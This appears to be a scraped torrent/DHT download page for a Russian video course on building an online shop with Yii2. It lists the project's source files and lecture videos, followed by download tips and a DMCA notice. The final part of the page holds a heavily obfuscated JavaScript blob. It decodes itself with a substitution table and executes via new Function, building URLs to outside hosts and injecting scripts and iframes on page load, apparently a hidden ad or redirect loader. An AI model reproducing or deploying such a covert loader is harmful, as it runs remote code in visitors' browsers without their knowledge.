    yii2-demo-shop-master/environments/dev/common/config/main-local.php 1.15 KB
    yii2-demo-shop-master/shop/forms/manage/User/UserEditForm.php 1.15 KB
    yii2-demo-shop-master/console/migrations/m170519_203816_create_shop_tag_assignments_table.php 1.16 KB
    yii2-demo-shop-master/console/migrations/m170519_183925_create_shop_values_table.php 1.16 KB
    yii2-demo-shop-master/shop/helpers/OrderHelper.php 1.17 KB
    yii2-demo-shop-master/shop/entities/Shop/Product/Review.php 1.18 KB
    yii2-demo-shop-master/backend/views/blog/category/index.php 1.19 KB
    yii2-demo-shop-master/backend/forms/Blog/CategorySearch.php 1.19 KB
    yii2-demo-shop-master/backend/forms/PageSearch.php 1.2 KB
    yii2-demo-shop-master/console/migrations/m170519_083418_create_shop_categories_table.php 1.2 KB
    yii2-demo-shop-master/backend/forms/Shop/CategorySearch.php 1.22 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/CategoriesForm.php 1.22 KB
    yii2-demo-shop-master/backend/views/blog/comment/index.php 1.22 KB
    yii2-demo-shop-master/shop/useCases/manage/Shop/OrderManageService.php 1.22 KB
    yii2-demo-shop-master/frontend/views/blog/post/category.php 1.23 KB
    yii2-demo-shop-master/console/migrations/m170519_203840_create_shop_related_assignments_table.php 1.23 KB
    yii2-demo-shop-master/shop/useCases/auth/SignupService.php 1.24 KB
    yii2-demo-shop-master/backend/views/shop/delivery/index.php 1.25 KB
    yii2-demo-shop-master/shop/entities/Shop/Product/Modification.php 1.25 KB
    yii2-demo-shop-master/backend/views/page/_form.php 1.26 KB
    yii2-demo-shop-master/console/migrations/m170519_183603_create_shop_category_assignments_table.php 1.26 KB
    yii2-demo-shop-master/frontend/controllers/auth/NetworkController.php 1.27 KB
    yii2-demo-shop-master/backend/views/site/error.php 1.27 KB
    yii2-demo-shop-master/shop/entities/Shop/Order/OrderItem.php 1.27 KB
    yii2-demo-shop-master/frontend/widgets/Shop/CategoriesWidget.php 1.27 KB
    yii2-demo-shop-master/api/providers/MapDataProvider.php 1.28 KB
    yii2-demo-shop-master/shop/entities/behaviors/MetaBehavior.php 1.29 KB
    yii2-demo-shop-master/console/config/main.php 1.29 KB
    yii2-demo-shop-master/shop/entities/Shop/DeliveryMethod.php 1.3 KB
    yii2-demo-shop-master/shop/services/WaterMarker.php 1.3 KB
    yii2-demo-shop-master/shop/useCases/manage/Shop/CharacteristicManageService.php 1.31 KB
    yii2-demo-shop-master/frontend/widgets/Blog/views/comments/comments.php 1.32 KB
    yii2-demo-shop-master/shop/forms/Shop/Search/ValueForm.php 1.32 KB
    yii2-demo-shop-master/api/controllers/shop/CheckoutController.php 1.33 KB
    yii2-demo-shop-master/frontend/tests/functional/LoginCest.php 1.33 KB
    yii2-demo-shop-master/shop/tests/unit/forms/PasswordResetRequestFormTest.php 1.34 KB
    yii2-demo-shop-master/api/tests/api/AuthCest.php 1.34 KB
    yii2-demo-shop-master/shop/tests/unit/forms/SignupFormTest.php 1.34 KB
    yii2-demo-shop-master/frontend/widgets/Blog/CommentsWidget.php 1.34 KB
    yii2-demo-shop-master/backend/views/blog/category/_form.php 1.35 KB
    yii2-demo-shop-master/frontend/views/contact/index.php 1.36 KB
    yii2-demo-shop-master/frontend/views/cabinet/order/index.php 1.36 KB
    yii2-demo-shop-master/shop/entities/Shop/Discount.php 1.36 KB
    yii2-demo-shop-master/backend/views/shop/category/_form.php 1.37 KB
    yii2-demo-shop-master/frontend/controllers/cabinet/NetworkController.php 1.37 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/ValueForm.php 1.37 KB
    yii2-demo-shop-master/frontend/controllers/auth/AuthController.php 1.38 KB
    yii2-demo-shop-master/console/migrations/m170602_114629_create_shop_cart_items_table.php 1.38 KB
    yii2-demo-shop-master/shop/cart/storage/CookieStorage.php 1.41 KB
    yii2-demo-shop-master/shop/forms/Shop/Search/SearchForm.php 1.41 KB
    yii2-demo-shop-master/console/migrations/m170531_085557_create_blog_comments_table.php 1.42 KB
    yii2-demo-shop-master/backend/views/shop/brand/view.php 1.42 KB
    yii2-demo-shop-master/console/migrations/m170519_181139_create_shop_products_table.php 1.42 KB
    yii2-demo-shop-master/shop/entities/Blog/Post/Comment.php 1.42 KB
    yii2-demo-shop-master/frontend/controllers/cabinet/OrderController.php 1.43 KB
    yii2-demo-shop-master/shop/forms/manage/Blog/CategoryForm.php 1.45 KB
    yii2-demo-shop-master/shop/entities/Blog/Category.php 1.45 KB
    yii2-demo-shop-master/shop/repositories/Shop/ProductRepository.php 1.46 KB
    yii2-demo-shop-master/shop/useCases/manage/Shop/BrandManageService.php 1.46 KB
    yii2-demo-shop-master/backend/forms/Blog/PostSearch.php 1.47 KB
    yii2-demo-shop-master/frontend/views/cabinet/wishlist/index.php 1.47 KB
    yii2-demo-shop-master/frontend/views/shop/catalog/category.php 1.49 KB
    yii2-demo-shop-master/backend/forms/Shop/CharacteristicSearch.php 1.5 KB
    yii2-demo-shop-master/backend/views/shop/characteristic/view.php 1.55 KB
    yii2-demo-shop-master/api/controllers/SiteController.php 1.56 KB
    yii2-demo-shop-master/LICENSE.md 1.56 KB
    yii2-demo-shop-master/shop/entities/Page.php 1.57 KB
    yii2-demo-shop-master/frontend/views/blog/post/post.php 1.57 KB
    yii2-demo-shop-master/backend/views/shop/order/index.php 1.58 KB
    yii2-demo-shop-master/frontend/controllers/shop/CheckoutController.php 1.58 KB
    yii2-demo-shop-master/shop/forms/manage/PageForm.php 1.58 KB
    yii2-demo-shop-master/shop/cart/storage/HybridStorage.php 1.59 KB
    yii2-demo-shop-master/backend/views/shop/order/update.php 1.62 KB
    yii2-demo-shop-master/frontend/tests/functional/SignupCest.php 1.63 KB
    yii2-demo-shop-master/shop/listeners/Shop/Product/ProductAppearedInStockListener.php 1.65 KB
    yii2-demo-shop-master/backend/views/user/view.php 1.65 KB
    yii2-demo-shop-master/console/migrations/m170529_122625_create_shop_orders_table.php 1.65 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/CharacteristicForm.php 1.65 KB
    yii2-demo-shop-master/console/migrations/m170529_122825_create_shop_order_items_table.php 1.66 KB
    yii2-demo-shop-master/backend/controllers/AuthController.php 1.67 KB
    yii2-demo-shop-master/api/web/docs/oauth2-redirect.html 1.68 KB
    yii2-demo-shop-master/backend/forms/Blog/CommentSearch.php 1.68 KB
    yii2-demo-shop-master/frontend/controllers/cabinet/ProfileController.php 1.69 KB
    yii2-demo-shop-master/shop/useCases/auth/PasswordResetService.php 1.69 KB
    yii2-demo-shop-master/frontend/web/image/eway_creditcard_diners.png 1.7 KB
    yii2-demo-shop-master/shop/useCases/manage/Blog/CategoryManageService.php 1.7 KB
    yii2-demo-shop-master/backend/views/shop/characteristic/index.php 1.7 KB
    yii2-demo-shop-master/common/auth/Identity.php 1.74 KB
    yii2-demo-shop-master/frontend/views/auth/auth/login.php 1.75 KB
    yii2-demo-shop-master/shop/forms/manage/Blog/Post/PostForm.php 1.75 KB
    yii2-demo-shop-master/shop/cart/storage/DbStorage.php 1.76 KB
    yii2-demo-shop-master/frontend/config/urlManager.php 1.78 KB
    yii2-demo-shop-master/api/controllers/user/ProfileController.php 1.78 KB
    yii2-demo-shop-master/backend/views/page/index.php 1.79 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/CategoryForm.php 1.8 KB
    yii2-demo-shop-master/backend/views/auth/login.php 1.81 KB
    yii2-demo-shop-master/backend/forms/UserSearch.php 1.82 KB
    yii2-demo-shop-master/backend/views/shop/category/index.php 1.83 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/ProductCreateForm.php 1.86 KB
    yii2-demo-shop-master/shop/readModels/Blog/PostReadRepository.php 1.87 KB
    yii2-demo-shop-master/frontend/config/main.php 1.88 KB
    yii2-demo-shop-master/environments/index.php 1.89 KB
    yii2-demo-shop-master/shop/cart/CartItem.php 1.91 KB
    yii2-demo-shop-master/backend/views/page/view.php 1.93 KB
    yii2-demo-shop-master/shop/entities/Shop/Characteristic.php 1.95 KB
    yii2-demo-shop-master/backend/web/css/site.css 1.95 KB
    yii2-demo-shop-master/backend/forms/Shop/ProductSearch.php 1.96 KB
    yii2-demo-shop-master/frontend/views/shop/catalog/_product.php 1.96 KB
    yii2-demo-shop-master/shop/entities/Shop/Category.php 1.98 KB
    yii2-demo-shop-master/shop/useCases/manage/UserManageService.php 1.99 KB
    yii2-demo-shop-master/backend/views/shop/category/view.php 2 KB
    yii2-demo-shop-master/frontend/tests/functional/ContactCest.php 2 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/ProductEditForm.php 2.01 KB
    yii2-demo-shop-master/shop/services/sitemap/Sitemap.php 2.01 KB
    yii2-demo-shop-master/backend/views/blog/category/view.php 2.03 KB
    yii2-demo-shop-master/frontend/web/image/eway_creditcard_master.png 2.05 KB
    yii2-demo-shop-master/frontend/controllers/auth/SignupController.php 2.06 KB
    yii2-demo-shop-master/backend/views/blog/post/index.php 2.08 KB
    yii2-demo-shop-master/frontend/controllers/auth/ResetController.php 2.11 KB
    yii2-demo-shop-master/shop/entities/Shop/Product/Photo.php 2.15 KB
    yii2-demo-shop-master/shop/readModels/Shop/CategoryReadRepository.php 2.15 KB
    yii2-demo-shop-master/shop/useCases/manage/PageManageService.php 2.18 KB
    yii2-demo-shop-master/shop/repositories/UserRepository.php 2.22 KB
    yii2-demo-shop-master/backend/views/blog/comment/view.php 2.25 KB
    yii2-demo-shop-master/frontend/controllers/cabinet/WishlistController.php 2.28 KB
    yii2-demo-shop-master/shop/services/search/ProductIndexer.php 2.28 KB
    yii2-demo-shop-master/composer.json 2.29 KB
    yii2-demo-shop-master/backend/views/site/index.php 2.3 KB
    yii2-demo-shop-master/frontend/widgets/Shop/views/featured.php 2.3 KB
    yii2-demo-shop-master/common/widgets/Alert.php 2.33 KB
    yii2-demo-shop-master/backend/views/blog/post/_form.php 2.34 KB
    yii2-demo-shop-master/frontend/views/shop/catalog/search.php 2.37 KB
    yii2-demo-shop-master/frontend/views/cabinet/order/view.php 2.45 KB
    yii2-demo-shop-master/frontend/controllers/payment/RobokassaController.php 2.48 KB
    yii2-demo-shop-master/shop/useCases/Shop/OrderService.php 2.49 KB
    yii2-demo-shop-master/frontend/urls/PageUrlRule.php 2.5 KB
    yii2-demo-shop-master/shop/cart/Cart.php 2.51 KB
    yii2-demo-shop-master/Vagrantfile 2.51 KB
    yii2-demo-shop-master/backend/views/user/index.php 2.53 KB
    yii2-demo-shop-master/backend/views/shop/product/index.php 2.54 KB
    yii2-demo-shop-master/console/migrations/m170607_105303_create_shop_elasticsearch_index.php 2.73 KB
    yii2-demo-shop-master/shop/entities/behaviors/FlySystemImageUploadBehavior.php 2.74 KB
    yii2-demo-shop-master/shop/useCases/manage/Shop/CategoryManageService.php 2.76 KB
    yii2-demo-shop-master/backend/config/main.php 2.79 KB
    yii2-demo-shop-master/vagrant/provision/once-as-root.sh 2.92 KB
    yii2-demo-shop-master/frontend/urls/CategoryUrlRule.php 3.01 KB
    yii2-demo-shop-master/frontend/views/shop/catalog/_list.php 3.1 KB
    yii2-demo-shop-master/shop/forms/CompositeForm.php 3.19 KB
    yii2-demo-shop-master/frontend/controllers/shop/CartController.php 3.25 KB
    yii2-demo-shop-master/frontend/controllers/blog/PostController.php 3.33 KB
    yii2-demo-shop-master/backend/controllers/blog/TagController.php 3.36 KB
    yii2-demo-shop-master/backend/controllers/shop/TagController.php 3.36 KB
    yii2-demo-shop-master/backend/controllers/shop/BrandController.php 3.4 KB
    yii2-demo-shop-master/api/web/docs/index.html 3.4 KB
    yii2-demo-shop-master/vagrant/nginx/app.conf 3.41 KB
    yii2-demo-shop-master/frontend/web/image/eway_paypal.png 3.43 KB
    yii2-demo-shop-master/shop/useCases/manage/Blog/PostManageService.php 3.46 KB
    yii2-demo-shop-master/backend/controllers/blog/CategoryController.php 3.46 KB
    yii2-demo-shop-master/frontend/widgets/Shop/views/cart.php 3.47 KB
    yii2-demo-shop-master/backend/controllers/shop/DeliveryController.php 3.51 KB
    yii2-demo-shop-master/backend/controllers/shop/ModificationController.php 3.53 KB
    yii2-demo-shop-master/backend/views/shop/product/update.php 3.54 KB
    yii2-demo-shop-master/backend/controllers/shop/CharacteristicController.php 3.58 KB
    yii2-demo-shop-master/backend/controllers/blog/CommentController.php 3.6 KB
    yii2-demo-shop-master/backend/controllers/shop/OrderController.php 3.64 KB
    yii2-demo-shop-master/frontend/web/image/klarna_nld_banner.png 3.65 KB
    yii2-demo-shop-master/backend/views/layouts/left.php 3.65 KB
    yii2-demo-shop-master/frontend/controllers/shop/CatalogController.php 3.67 KB
    yii2-demo-shop-master/backend/controllers/PageController.php 3.74 KB
    yii2-demo-shop-master/backend/controllers/shop/CategoryController.php 3.84 KB
    yii2-demo-shop-master/frontend/views/shop/checkout/index.php 3.88 KB
    yii2-demo-shop-master/backend/controllers/UserController.php 3.89 KB
    yii2-demo-shop-master/frontend/web/image/logo.png 4.04 KB
    yii2-demo-shop-master/frontend/views/layouts/home.php 4.14 KB
    yii2-demo-shop-master/backend/views/blog/post/view.php 4.14 KB
    yii2-demo-shop-master/backend/views/shop/order/view.php 4.15 KB
    yii2-demo-shop-master/shop/services/yandex/YandexMarket.php 4.17 KB
    yii2-demo-shop-master/backend/controllers/blog/PostController.php 4.23 KB
    yii2-demo-shop-master/api/config/main.php 4.31 KB
    yii2-demo-shop-master/api/controllers/shop/WishlistController.php 4.34 KB
    yii2-demo-shop-master/backend/views/shop/product/create.php 4.62 KB
    yii2-demo-shop-master/frontend/views/shop/cart/index.php 4.9 KB
    yii2-demo-shop-master/requirements.php 4.93 KB
    yii2-demo-shop-master/common/bootstrap/SetUp.php 5.04 KB
    yii2-demo-shop-master/frontend/web/image/eway_creditcard_amex.png 5.22 KB
    yii2-demo-shop-master/shop/entities/Shop/Order/Order.php 5.55 KB
    yii2-demo-shop-master/frontend/web/image/eway_masterpass.png 5.66 KB
    yii2-demo-shop-master/frontend/controllers/SitemapController.php 5.87 KB
    yii2-demo-shop-master/frontend/web/image/eway_vme.png 6.19 KB
    yii2-demo-shop-master/frontend/web/image/eway_creditcard_visa.png 6.27 KB
    yii2-demo-shop-master/console/migrations/m170601_182049_create_oauth_server_tables.php 6.59 KB
    yii2-demo-shop-master/shop/readModels/Shop/ProductReadRepository.php 7.48 KB
    yii2-demo-shop-master/shop/useCases/manage/Shop/ProductManageService.php 7.59 KB
    yii2-demo-shop-master/shop/entities/User/User.php 7.7 KB
    yii2-demo-shop-master/backend/controllers/shop/ProductController.php 8.01 KB
    yii2-demo-shop-master/shop/entities/Blog/Post/Post.php 8.13 KB
    yii2-demo-shop-master/frontend/views/shop/catalog/product.php 8.32 KB
    yii2-demo-shop-master/init 8.65 KB
    yii2-demo-shop-master/backend/views/layouts/content.php 8.7 KB
    yii2-demo-shop-master/api/controllers/shop/CartController.php 8.83 KB
    yii2-demo-shop-master/frontend/views/layouts/main.php 8.91 KB
    yii2-demo-shop-master/backend/views/shop/product/view.php 9.55 KB
    yii2-demo-shop-master/frontend/web/image/paypal_express_mobile.png 9.58 KB
    yii2-demo-shop-master/frontend/web/image/pilibaba_button.png 11.78 KB
    yii2-demo-shop-master/api/controllers/shop/ProductController.php 12.78 KB
    yii2-demo-shop-master/frontend/web/js/common.js 13.45 KB
    yii2-demo-shop-master/backend/views/layouts/header.php 14.65 KB
    yii2-demo-shop-master/shop/entities/Shop/Product/Product.php 17.33 KB
    yii2-demo-shop-master/frontend/web/css/stylesheet.css 18.05 KB
    yii2-demo-shop-master/api/web/docs/swagger.json 25.36 KB
    yii2-demo-shop-master/api/web/docs/swagger-ui.css 25.62 KB
    yii2-demo-shop-master/frontend/web/image/default.png 48.97 KB
    yii2-demo-shop-master/frontend/web/image/klarna_green_full.png 52.75 KB
    yii2-demo-shop-master/composer.lock 208.71 KB
    yii2-demo-shop-master/api/web/docs/swagger-ui-standalone-preset.js 243.4 KB
    yii2-demo-shop-master/api/web/docs/swagger-ui.js 250.92 KB
    yii2-demo-shop-master/api/web/docs/swagger-ui-bundle.js 1.14 MB
    06/Магазин_на_Yii2_26.05.2017_19-06-41.mp4 620.24 MB
    08/Магазин_на_Yii2_31.05.2017_19-07-44.mp4 757.9 MB
    10/Магазин_на_Yii2_05.06.2017_19-08-52.mp4 765.18 MB
    01/Магазин_на_Yii2_15.05.2017_19-04-31.mp4 796.45 MB
    07/Магазин_на_Yii2_29.05.2017_19-08-02.mp4 800.37 MB
    11/Магазин_на_Yii2_07.06.2017_19-12-20.mp4 817.06 MB
    03/Магазин_на_Yii2_19.05.2017_19-12-20.mp4 819.21 MB
    02/Магазин_на_Yii2_17.05.2017_19-06-26.mp4 884.19 MB
    04/Магазин_на_Yii2_22.05.2017_19-12-01.mp4 906.64 MB
    09/Магазин_на_Yii2_02.06.2017_19-05-24.mp4 938.3 MB
    05/Магазин_на_Yii2_25.05.2017_19-09-48.mp4 1.01 GB

Download Info

  • Tips

    “Мастер-класс по разработке интернет-магазина на Yii2. Дмитрий Елисеев” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();